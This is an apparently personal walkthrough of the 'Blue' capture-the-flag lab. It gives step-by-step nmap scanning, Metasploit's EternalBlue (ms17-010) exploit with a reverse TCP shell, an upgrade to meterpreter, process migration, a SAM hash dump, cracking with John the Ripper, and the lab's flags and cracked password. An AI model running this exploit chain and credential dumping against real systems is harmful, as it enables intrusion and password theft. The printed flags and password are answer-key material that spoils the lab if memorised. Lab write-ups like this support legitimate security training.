Blue Exploit

Recon

s1: nmap -sV -sC --script vuln -oN blue.nmap 10.10.95.33 | vulnerability scan , ms17-010)

Exploit / Gain Access

s2: start metasploit | msfconsole

s3: search exploit ms17-010 | select use 0 | exploit/windows/smb/ms17_010_eternalblue

s4: show options > set RHOSTS 10.10.95.33

s5: show payloads | use 55 payload/windows/x64/shell/reverse_tcp

s6: set payload 55

s7: run exploit | run command = C:\Windows\system32>

s8: background the shell | Ctrl + Z

Escalate

s9: upgrade shell to meterpreter = shell_to_meterpreter > use multi/manage/shell_to_meterpreter | https://null-byte.wonderhowto.com/how-to/upgrade-normal-command-shell-metasploit-meterpreter-0166013/

show options > set sessions | set session 1 > run exploit

select that session for use | sessions -u 1 to upgrade session

run sessions - to see all running sessions

use session 2: to select session 2 ( meterpreter)

run shell to return to windows command line to verify escalation> run whoami to verify system name > background shell to retrun to meterpreter shell

s10: List all of the processes running via the 'ps' command. Just because we are system doesn't mean our process is. Find a process towards the bottom of this list that is running at NT AUTHORITY\SYSTEM and write down the process id

1292 704 spoolsv.exe x64 0 NT AUTHORITY\SYST C:\Windows\System3

s11: Migrate to this process | migrate 1292

Cracking

s12: Dump the non-default user's password and crack it!

hashdump Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::

s13: Crack the password Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::

save password into a .txt file = hash.txt

search password in https://www.tunnelsup.com/hash-analyzer/ to determine hash type or format

using john the ripper run the command

john --format=NT --w=/usr/share/wordlists/rockyou.txt '/root/hash.txt' | password = alqfna22

Finding flags

Flag 1:

cd C:/ > cat flag1.txt

flag: flag{access_the_machine}

Falg 2:

google windows sam file location | c:\Windows\System32\config\flag2.txt

cd C://Windows/System32/config > cat flag2.txt OR

cat 'c:\Windows\System32\config\flag2.txt'

flag: flag{sam_database_elevated_access}

Flag 3:

Alternatively we can use meterpreter search funtion to search file location

search -f flag*.txt | c:\Users\Jon\Documents\flag3.txt

cat file location with 2 \\ or ' '| cat :\\Users\\Jon\\Documents\\flag3.txt | cat 'c:\Users\Jon\Documents\flag3.txt'

cat flag3.txt |

Last updated